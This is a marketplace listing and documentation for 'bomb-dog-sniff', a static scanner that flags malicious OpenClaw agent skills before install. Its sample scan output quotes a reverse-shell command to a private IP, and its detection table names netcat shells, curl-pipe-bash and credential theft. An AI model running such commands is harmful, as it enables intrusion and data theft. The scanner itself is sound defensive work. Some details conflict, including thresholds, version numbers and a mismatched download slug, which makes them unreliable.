# Send Bomb Dog Sniff to your agent
Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.
## Fast path
- Download the package from Yavira.
- Extract it into a folder your agent can access.
- Paste one of the prompts below and point your agent at the extracted folder.
## Suggested prompts
### New install

```text
I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete.
```
### Upgrade existing

```text
I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run.
```
## Machine-readable fields
```json
{
  "schemaVersion": "1.0",
  "item": {
    "slug": "skill-bomb-dog-sniff",
    "name": "Bomb Dog Sniff",
    "source": "tencent",
    "type": "skill",
    "category": "安全合规",
    "sourceUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "canonicalUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadUrl": "/downloads/skill-bomb-dog-sniff",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-bomb-dog-sniff",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "packageFormat": "ZIP package",
    "primaryDoc": "SKILL.md",
    "includedAssets": [
      ".guardianrc.example.json",
      "PERFECTION_SUMMARY.md",
      "SKILL.md",
      "package.json",
      "patterns.js",
      "safe-download.js"
    ],
    "downloadMode": "redirect",
    "sourceHealth": {
      "source": "tencent",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-04-23T16:43:11.935Z",
      "expiresAt": "2026-04-30T16:43:11.935Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
        "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"",
        "redirectLocation": null,
        "bodySnippet": null
      },
      "scope": "source",
      "summary": "Source download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this source.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/skill-bomb-dog-sniff"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    }
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff",
    "downloadUrl": "https://openagent3.xyz/downloads/skill-bomb-dog-sniff",
    "agentUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent",
    "manifestUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md"
  }
}
```
## Documentation

### bomb-dog-sniff v1.2.0 🐕

Like a bomb-sniffing dog for OpenClaw skills

Sniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.

### Security Hardening

- Fixed command injection vulnerabilities in download functions
- Added path traversal protection - Sanitizes all path inputs
- Secure quarantine - Randomized directory names with restricted permissions
- Binary file detection - Skips binary files to avoid false positives
- File size limits - Prevents DoS via huge files
- ReDoS protection - Limits regex processing on long lines

### Detection Improvements

- Smart false positive reduction - Better context-aware pattern matching
- Entropy analysis - Detects encoded/encrypted payloads
- Test file awareness - Reduces severity for findings in test files
- Confidence scoring - Each finding has confidence level (high/medium/low)
- 13 detection categories - Added supply chain, prototype pollution, and malicious script detection

### New Patterns

- Supply chain attack indicators (typosquatting, dynamic requires)
- Prototype pollution vulnerabilities
- Malicious npm/yarn scripts
- Browser credential theft
- SSH key theft
- Systemd persistence mechanisms

### Quick Start

```bash
# Sniff out threats before installing
openclaw skill bomb-dog-sniff scan ./downloaded-skill

# Safe install from clawhub (auto-downloads, sniffs, installs if clean)
openclaw skill bomb-dog-sniff safe-install cool-skill

# Audit an already-installed skill
openclaw skill bomb-dog-sniff audit bird

# Batch scan multiple skills
openclaw skill bomb-dog-sniff batch skills-to-audit.txt
```

### scan

Scan a skill directory for malicious patterns.

```text
openclaw skill bomb-dog-sniff scan <path> [options]

Options:
  -j, --json          Output JSON only
  -v, --verbose       Show detailed findings
  -t, --threshold N   Set risk threshold (default: 40)
  -h, --help          Show help
```

Example:

```bash
openclaw skill bomb-dog-sniff scan ./untrusted-skill
openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json
```

Output:

```text
🔍 Bomb-Dog-Sniff Security Scanner v1.2.0
Target: /home/user/skills/untrusted-skill

🔴 CRITICAL (2)
──────────────────────────────────────────────────
  crypto_harvester: scripts/wallet.js:23
    Crypto wallet private key harvesting detected
    Code: const privateKey = "a1b2c3..."
    Confidence: high

  reverse_shell: scripts/backdoor.sh:5
    Reverse shell or remote code execution detected
    Code: bash -i >& /dev/tcp/192.168.1.100/4444
    Confidence: high

🟠 HIGH (1)
──────────────────────────────────────────────────
  pipe_bash: install.sh:12
    Dangerous curl | bash pattern detected
    Confidence: high

═══════════════════════════════════════════════════
SCAN SUMMARY
═══════════════════════════════════════════════════
☠️ Risk Score: 75/100
   Risk Level: MALICIOUS
   Duration: 125ms
   Files Scanned: 12/15
   Files Skipped: 3 (binary/empty/large)
   Findings: 3

   Severity Breakdown:
     🔴 CRITICAL: 2
     🟠 HIGH: 1

📋 Recommendation:
   MALICIOUS - Do not install. Found 3 critical security issues.

Scan ID: bds-20260208-a1b2c3d4
```

### safe-install

Download from clawhub/GitHub, scan, and install only if safe.

```text
openclaw skill bomb-dog-sniff safe-install <source> [options]

Source:
  - ClawHub skill name: bird
  - GitHub URL: https://github.com/user/skill
  - Local path: ./local-skill

Options:
  --threshold N   Set risk threshold (default: 39)
  --dry-run       Scan only, don't install
  --verbose       Show all findings
```

Example:

```bash
# Install with default threshold (39)
openclaw skill bomb-dog-sniff safe-install bird

# Stricter threshold
openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20

# Scan only (dry run)
openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run

# GitHub source
openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill
```

### audit

Audit an already-installed skill.

```text
openclaw skill bomb-dog-sniff audit <skill-name> [options]
```

Example:

```bash
openclaw skill bomb-dog-sniff audit notion
```

### batch

Scan multiple skills from a list file.

```text
openclaw skill bomb-dog-sniff batch <list-file>
```

Example list file (skills.txt):

```text
# My installed skills to audit
bird
notion
gog
slack
./custom-skill

# Commented lines are ignored
# old-skill
```

Run:

```bash
openclaw skill bomb-dog-sniff batch skills.txt
```

### Detection Categories

bomb-dog-sniff scans for these threat categories:

| Category | Severity | Examples Detected |
| --- | --- | --- |
| crypto_harvester | CRITICAL | Private key extraction, wallet exports, mnemonic theft |
| credential_theft | CRITICAL | Environment variable exfiltration, config file theft, SSH key theft |
| reverse_shell | CRITICAL | Netcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code |
| keylogger | CRITICAL | Keyboard capture with exfiltration, clipboard theft, password field monitoring |
| encoded_payload | HIGH | Base64 execution chains, hex escapes with eval context, obfuscated code |
| suspicious_api | HIGH | Pastebin/ngrok/webhook destinations, dynamic URL construction with secrets |
| pipe_bash | HIGH | `curl \| bash`, `wget \| sh` patterns |
| deposit_scam | HIGH | "Send ETH to 0x...", payment prompts in unexpected contexts |
| supply_chain | HIGH | Typosquatting, dynamic requires, suspicious postinstall scripts |
| prototype_pollution | HIGH | Dangerous object merging, `__proto__` manipulation |
| malicious_script | CRITICAL | Pre/postinstall doing network/exec operations, modifying other packages |
| network_exfil | MEDIUM | File reading followed by network transmission |
| file_tamper | CRITICAL | .bashrc modification, crontab editing, SSH authorized_keys manipulation |

### Risk Scoring

```text
0-19   SAFE        ✅ Install freely
20-39  LOW         ⚠️  Review recommended
40-69  SUSPICIOUS  🚫 Blocked by default
70-100 MALICIOUS   ☠️  Never install
```

Each finding adds to the score:

- CRITICAL: +25 points (× confidence multiplier)
- HIGH: +15 points (× confidence multiplier)
- MEDIUM: +5 points (× confidence multiplier)

Confidence multipliers:

- High confidence: 1.0×
- Medium confidence: 0.75×
- Low confidence: 0.5×

Score caps at 100.
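
The scoring rules above, worked through as an added example (this is not code from scan.js). The function names are hypothetical, rounding of fractional totals is an assumption, and the findings are constructed.

```javascript
// Points, multipliers and bands are copied from the Risk Scoring section.
const SEVERITY_POINTS = { CRITICAL: 25, HIGH: 15, MEDIUM: 5 };
const CONFIDENCE_MULTIPLIER = { high: 1.0, medium: 0.75, low: 0.5 };
const BANDS = [
  { max: 19, level: 'SAFE' },
  { max: 39, level: 'LOW' },
  { max: 69, level: 'SUSPICIOUS' },
  { max: 100, level: 'MALICIOUS' },
];

// Sum severity points weighted by confidence, capped at 100.
function riskScore(findings) {
  let total = 0;
  for (const f of findings) {
    const points = SEVERITY_POINTS[f.severity];
    const multiplier = CONFIDENCE_MULTIPLIER[f.confidence];
    if (points === undefined || multiplier === undefined) {
      throw new Error(`unknown severity or confidence: ${JSON.stringify(f)}`);
    }
    total += points * multiplier;
  }
  // Assumption: fractional totals are rounded to the nearest integer.
  return Math.min(100, Math.round(total));
}

function riskLevel(score) {
  return BANDS.find((band) => score <= band.max).level;
}

// Decision rule from the safe-install flow: block when risk > threshold.
// 39 is the safe-install default stated in this document.
function evaluate(findings, threshold = 39) {
  const score = riskScore(findings);
  return { score, level: riskLevel(score), blocked: score > threshold };
}

// Constructed findings: 18.75 + 15 + 2.5 = 36.25, which rounds to 36.
const SAMPLE_FINDINGS = [
  { category: 'reverse_shell', severity: 'CRITICAL', confidence: 'medium' },
  { category: 'pipe_bash', severity: 'HIGH', confidence: 'high' },
  { category: 'network_exfil', severity: 'MEDIUM', confidence: 'low' },
];
console.log(evaluate(SAMPLE_FINDINGS));     // not blocked at the default
console.log(evaluate(SAMPLE_FINDINGS, 20)); // blocked at --threshold 20
```

Under these rules a single high-confidence CRITICAL finding scores 25, which is LOW and under the default threshold, so the individual findings need reading even when an install is not blocked.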

### Safe Install Process

```text
1. QUARANTINE
   └── Skill downloaded to /tmp/bds-q-<random>/
   └── Randomized, non-predictable directory name
   └── Restricted permissions (0o700)

2. SCAN
   ├── Check all files against detection patterns
   ├── Skip binary files, empty files, files >10MB
   ├── Calculate entropy for encoded payload detection
   ├── Apply confidence multipliers
   └── Generate findings report

3. DECISION
   ├── Risk > threshold? → BLOCK & DELETE
   └── Risk ≤ threshold? → PROCEED

4. INSTALL (if passed)
   └── Move from quarantine to skills directory
   └── Backup existing installation (max 5 backups)

5. CLEANUP
   └── Securely remove quarantine directory
```
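
One way to implement the QUARANTINE and CLEANUP steps together with the path sanitization listed under Security Hardening, as an added example (not code from safe-download.js). The helper names `createQuarantine`, `resolveInside`, `stageFile` and `removeQuarantine` are hypothetical.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Hypothetical helper: create the quarantine directory. mkdtemp appends a
// random suffix to the prefix, so the final name cannot be predicted.
function createQuarantine(baseDir = os.tmpdir()) {
  const dir = fs.mkdtempSync(path.join(baseDir, 'bds-q-'));
  fs.chmodSync(dir, 0o700); // owner-only, set explicitly
  return dir;
}

// Hypothetical helper: map an untrusted relative path (for example an archive
// entry name) into the quarantine, rejecting anything that resolves outside.
// The check is lexical; it does not follow symlinks already on disk.
function resolveInside(root, untrusted) {
  if (typeof untrusted !== 'string' || untrusted.includes('\0')) {
    throw new Error('invalid path');
  }
  const base = path.resolve(root);
  const target = path.resolve(base, untrusted);
  // Comparing against base + separator also rejects sibling directories
  // whose names merely start with the quarantine name.
  if (target !== base && !target.startsWith(base + path.sep)) {
    throw new Error(`path escapes quarantine: ${untrusted}`);
  }
  return target;
}

// Hypothetical helper: write one entry into the quarantine, owner-only.
function stageFile(root, relPath, data) {
  const target = resolveInside(root, relPath);
  fs.mkdirSync(path.dirname(target), { recursive: true, mode: 0o700 });
  fs.writeFileSync(target, data, { mode: 0o600 });
  return target;
}

// CLEANUP step: remove the quarantine whether or not the scan passed.
function removeQuarantine(dir) {
  fs.rmSync(dir, { recursive: true, force: true });
}
```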

### Scanning Details

- Static analysis only - No code execution
- Multi-pattern matching - 60+ detection patterns
- Line-level reporting - Exact file:line for each finding
- False positive reduction - Context-aware pattern matching
- Binary detection - Automatically skips binary files
- Symlink loop protection - Tracks visited inodes
- Depth limiting - Max 20 directory levels
- Test file handling - Reduces severity for test files

### Environment Variables

```bash
# Set custom skills directory
export OPENCLAW_SKILLS_DIR=/path/to/skills

# Set default risk threshold
export BOMB_DOG_THRESHOLD=25
```

### Per-Skill Configuration

Add to your skill's package.json:

```json
{
  "bomb-dog-sniff": {
    "riskThreshold": 25,
    "excludedCategories": ["network_exfil"]
  }
}
```

### CI/CD Integration

Add to your CI pipeline:

```yaml
# .github/workflows/skill-security.yml
name: Skill Security Scan

on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - name: Scan skills
        run: |
          for skill in skills/*/; do
            echo "Scanning $skill"
            node skills/bomb-dog-sniff/scan.js "$skill" || exit 1
          done
```

Exit codes:

- `0` - Safe (score below threshold)
- `1` - Error/invalid arguments
- `2` - Risky (score ≥ threshold)

### Programmatic API

```javascript
const { scanSkill } = require('./scan');
const { safeDownload } = require('./safe-download');

// Scan a skill
const report = scanSkill('./path/to/skill', { verbose: true });
console.log(`Risk score: ${report.riskScore}`);
console.log(`Findings: ${report.findings.length}`);

// Safe download and install.
// safeDownload is awaited, so it runs inside an async function (CommonJS has no top-level await).
async function main() {
  const result = await safeDownload('cool-skill', {
    autoInstall: true,
    riskThreshold: 30,
  });

  if (!result.success) {
    console.error('Installation blocked:', result.reason);
  }
}

main().catch(console.error);
```

### Security Limits

To prevent DoS and ensure scanner security:

| Limit | Value | Purpose |
| --- | --- | --- |
| Max file size | 10MB | Prevent memory exhaustion |
| Max line length | 10KB | Prevent ReDoS attacks |
| Max files per scan | 10,000 | Prevent resource exhaustion |
| Max findings per file | 100 | Prevent output flooding |
| Max total findings | 500 | Prevent result flooding |
| Max directory depth | 20 | Prevent infinite recursion |
| Download timeout | 2 minutes | Prevent hanging downloads |
| Max download size | 50MB | Prevent disk exhaustion |
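
How the file-size and line-length limits combine with binary skipping and entropy analysis in a pre-scan filter, as an added example (not code from scan.js). The NUL-byte binary heuristic, the 40-character token minimum, the 4.5 bits/char cutoff and all function names are assumptions; the sample text is constructed.

```javascript
const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB, from the limits table
const MAX_LINE_LENGTH = 10 * 1024;      // 10KB, from the limits table
const SNIFF_BYTES = 8192;               // assumption: bytes checked for NUL
const MIN_TOKEN_LENGTH = 40;            // assumption: shortest token measured
const ENTROPY_THRESHOLD = 4.5;          // assumption: bits per character

// Why a file is skipped ('empty' | 'large' | 'binary'), or null to scan it.
function skipReason(buf) {
  if (buf.length === 0) return 'empty';
  if (buf.length > MAX_FILE_SIZE) return 'large';
  if (buf.subarray(0, SNIFF_BYTES).includes(0)) return 'binary';
  return null;
}

// Shannon entropy in bits per character.
function shannonEntropy(str) {
  const chars = Array.from(str);
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) || 0) + 1);
  let bits = 0;
  for (const n of counts.values()) {
    const p = n / chars.length;
    bits -= p * Math.log2(p);
  }
  return bits;
}

// 1-based numbers of lines that contain a long, high-entropy token.
const TOKEN_RE = new RegExp(`[A-Za-z0-9+/=_-]{${MIN_TOKEN_LENGTH},}`, 'g');
function highEntropyLines(text) {
  const hits = [];
  text.split('\n').forEach((line, index) => {
    // Cap the line first so the matching cost per line is bounded.
    const bounded = line.slice(0, MAX_LINE_LENGTH);
    const tokens = bounded.match(TOKEN_RE) || [];
    if (tokens.some((t) => shannonEntropy(t) >= ENTROPY_THRESHOLD)) {
      hits.push(index + 1);
    }
  });
  return hits;
}

// Constructed sample: line 2 is long but repetitive, line 3 has 64 distinct symbols.
const SAMPLE = [
  'const greeting = "hello";',
  `const pad = "${'a'.repeat(48)}";`,
  'const blob = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";',
].join('\n');
```

Length alone does not trigger a finding here: the repetitive 48-character string on line 2 has zero entropy, which is the kind of case entropy analysis is meant to separate from encoded payloads.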

### False Positives

If legitimate code triggers a warning:

- Check confidence level - Low confidence findings are more likely to be false positives
- Review the excerpt - Look at the actual code flagged
- Test files are noted - Findings in `*.test.js` or `__tests__/` have reduced severity
- Comments are generally skipped - Unless they contain suspicious keywords

To report false positives, please include:

- The file content that triggered the false positive
- The pattern category that matched
- Expected behavior

### Best Practices

- Always scan before installing unknown skills
- Use `--dry-run` first for untrusted sources
- Set lower threshold (`--threshold 20`) for critical systems
- Audit regularly - Rescan installed skills periodically
- Review CRITICAL findings - Never ignore critical severity warnings
- Check confidence levels - High confidence = higher priority

### Files

- SKILL.md - This documentation
- scan.js - Core scanner engine
- patterns.js - Detection pattern definitions
- safe-download.js - Safe download & install logic
- scripts/sniff.sh - CLI wrapper
- package.json - Package configuration
- QUICKSTART.md - Quick reference guide

### Security Notes

⚠️ Limitations:

- Static analysis only (some obfuscation may evade detection)
- Pattern-based (novel attacks may not be detected)
- Not a replacement for manual code review on critical systems
- Cannot detect runtime-only malicious behavior

✅ Recommendations:

- Use bomb-dog-sniff as first line of defense
- Review code manually for high-security environments
- Keep patterns.js updated with new threat signatures
- Report false positives and missed detections
- Combine with other security tools for defense in depth

### v1.2.0 (Hardened Edition)

- SECURITY: Fixed command injection vulnerabilities in safe-download.js
- SECURITY: Added path traversal protection
- SECURITY: Secure randomized quarantine directories
- FEATURE: Binary file detection and skipping
- FEATURE: File size limits (10MB per file, 50MB download)
- FEATURE: Entropy analysis for encoded payload detection
- FEATURE: Confidence scoring for all findings
- FEATURE: Test file awareness with severity reduction
- FEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)
- IMPROVEMENT: Better false positive reduction with context-aware matching
- IMPROVEMENT: ReDoS protection via line length limits
- IMPROVEMENT: Symlink loop protection
- IMPROVEMENT: Backup rotation (max 5 backups)

### v1.1.0

- Added safe-install command with quarantine workflow
- Added audit command for installed skills
- Added batch command for multiple skill scanning
- Enhanced detection patterns (50+ signatures)
- Added risk threshold configuration

### v1.0.0

- Initial release with basic scanning
- 10 detection categories
- JSON output format

### License

MIT - See LICENSE file

Stay safe. Scan everything. Trust verified skills only. 🦞🐕
## Trust
- Source: tencent
- Verification: Indexed source record
- Publisher: LvcidPsyche
- Version: 0.1.0
## Source health
- Status: healthy
- Source download looks usable.
- Yavira can redirect you to the upstream package for this source.
- Health scope: source
- Reason: direct_download_ok
- Checked at: 2026-04-23T16:43:11.935Z
- Expires at: 2026-04-30T16:43:11.935Z
- Recommended action: Download for OpenClaw
## Links
- [Detail page](https://openagent3.xyz/skills/skill-bomb-dog-sniff)
- [Send to Agent page](https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent)
- [JSON manifest](https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json)
- [Markdown brief](https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md)
- [Download page](https://openagent3.xyz/downloads/skill-bomb-dog-sniff)